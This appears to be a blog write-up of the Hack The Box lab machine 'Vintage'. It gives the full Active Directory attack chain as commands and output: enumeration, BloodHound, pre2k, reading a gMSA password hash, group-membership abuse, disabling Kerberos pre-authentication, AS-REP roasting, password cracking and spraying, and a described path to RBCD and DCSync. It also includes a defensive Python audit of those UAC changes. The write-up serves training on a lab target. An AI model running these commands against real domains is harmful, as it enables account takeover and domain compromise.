用多少眼泪才能让你相信 posted on 2025-4-8 14:40:32

HTB box notes: Vintage

Information gathering

nmap -sV -sC -O 10.10.11.45
Nmap scan report for 10.10.11.45
Host is up (2.1s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec?
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn?
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.95%I=7%D=4/7%Time=67F39479%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,5,"\x83\0\0\x01\x8f");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-04-07T08:43:58
|_start_date: N/A
|_clock-skew: -19m07s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 370.27 seconds

The box description provides a credential: P.Rosa:Rosaisbest123
GetTGT

impacket-getTGT 'vintage.htb/P.Rosa:Rosaisbest123' -dc-ip 10.10.11.45
Remember to run this under faketime (the host's clock is skewed; see the nmap output above).
export KRB5CCNAME=P.Rosa.ccache
Gathering information via LDAP

SMB does not work, so enumerate via LDAP instead: nxc ldap 10.10.11.45 -d vintage.htb -k --use-kcache --users
Administrator
Guest
krbtgt
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

The LDAP enumeration is incomplete, so switch to SMB:
nxc smb 10.10.11.45 -d vintage.htb -u P.Rosa -k --use-kcache --rid-brute | grep "SidTypeUser"
Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

The usual techniques were all tried and nothing further could be collected, so go straight to BloodHound to look for a foothold.
bloodhound

faketime "$(ntpdate -q 10.10.11.45 | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')" bloodhound-python -d vintage.htb -u P.Rosa -k -no-pass -ns 10.10.11.45 -c all --zip
FS01 belongs to the Pre-Windows 2000 Compatible Access group, so it is worth trying pre2k against it.
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408135912.png
pre2k

pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile user.txt
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408142821.png
Continuing to look at FS01's relationships in the domain graph, the password hash of GMSA01 can be read from msDS-ManagedPassword.
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408143003.png
GMSA

bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408144149.png
Get a TGT: impacket-getTGT vintage.htb/'gmsa01$' -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178 -dc-ip 10.10.11.45
Looking at gmsa01's relationships in the domain graph, gmsa01 can add itself to the SERVICEMANAGERS group.
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408144759.png
AddSelf/GenericWrite

bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" 'GMSA01$'
Check whether the member was added successfully:
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408145924.png
Look at the SERVICEMANAGERS group's relationships in the domain graph.
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408155327.png
The group has GenericAll over these three users, so pre-authentication can be disabled on them for AS-REP Roasting:
bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
The svc_sql account is disabled; enable it by removing ACCOUNTDISABLE from its UAC:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac svc_sql -f ACCOUNTDISABLE
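From the defender's side, the two bloodyAD commands above flip exactly two bits of userAccountControl on svc_sql. The following Python audit (an added example, not code from the original post) decodes those bits over a constructed LDAP-style export and flags both the resulting weak state and the before/after transitions; the export records and their values are assumed sample data.

```python
# Flag bits of the userAccountControl attribute (subset relevant here).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Constructed sample exports (sAMAccountName + userAccountControl), standing in
# for two LDAP pulls taken before and after the changes described in the post.
BEFORE_EXPORT = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x0202},   # disabled
    {"sAMAccountName": "svc_ldap", "userAccountControl": 0x0200},
    {"sAMAccountName": "svc_ark", "userAccountControl": 0x0200},
]
AFTER_EXPORT = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x400200},  # enabled, no preauth
    {"sAMAccountName": "svc_ldap", "userAccountControl": 0x0200},
    {"sAMAccountName": "svc_ark", "userAccountControl": 0x0200},
]


def decode_uac(value):
    """Return the set of flag names whose bits are set in a UAC value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def audit_uac(current, previous=None):
    """Return (sAMAccountName, finding) pairs.

    Always reports enabled accounts that do not require Kerberos pre-authentication
    (the state that makes them roastable). Given a previous export, also reports the
    two transitions a GenericAll holder produces: preauth newly disabled and a
    disabled account newly re-enabled.
    """
    prev = {r["sAMAccountName"]: decode_uac(r["userAccountControl"])
            for r in (previous or [])}
    findings = []
    for rec in current:
        name = rec["sAMAccountName"]
        flags = decode_uac(rec["userAccountControl"])
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            findings.append((name, "enabled account without Kerberos pre-authentication"))
        old = prev.get(name)
        if old is None:
            continue
        if "DONT_REQ_PREAUTH" in flags - old:
            findings.append((name, "pre-authentication newly disabled"))
        if "ACCOUNTDISABLE" in old - flags:
            findings.append((name, "disabled account newly re-enabled"))
    return findings
```

Running audit_uac(AFTER_EXPORT, BEFORE_EXPORT) reports all three findings for svc_sql only; the other service accounts are unchanged and stay silent.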
Run AS-REP Roasting:
impacket-GetNPUsers vintage/ -request -format hashcat -usersfile user.txt -outputfile np.txt -dc-ip 10.10.11.45 -dc-host dc01.vintage.htb
Crack svc_sql's password:
john np.txt -w=/usr/share/wordlists/rockyou.txt
Password obtained: ???????
Spray this password against the other users:
kerbrute passwordspray -d vintage.htb user.txt
It hits C.Neri. WinRM should be able to connect as C.Neri at this point, but I could not get it to connect no matter what I tried, so I will just describe the rest of the attack path. C.Neri is also in the SERVICEMANAGERS group, so an RBCD attack can be performed through svc_sql. We need to pick a high-privilege user to impersonate: L.Bianchi_adm has DCSync rights over the domain controller, so RBCD can be used to obtain a TGT for L.Bianchi_adm, and then DCSync against the DC yields the domain administrator's NTLM hash.
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408161039.png
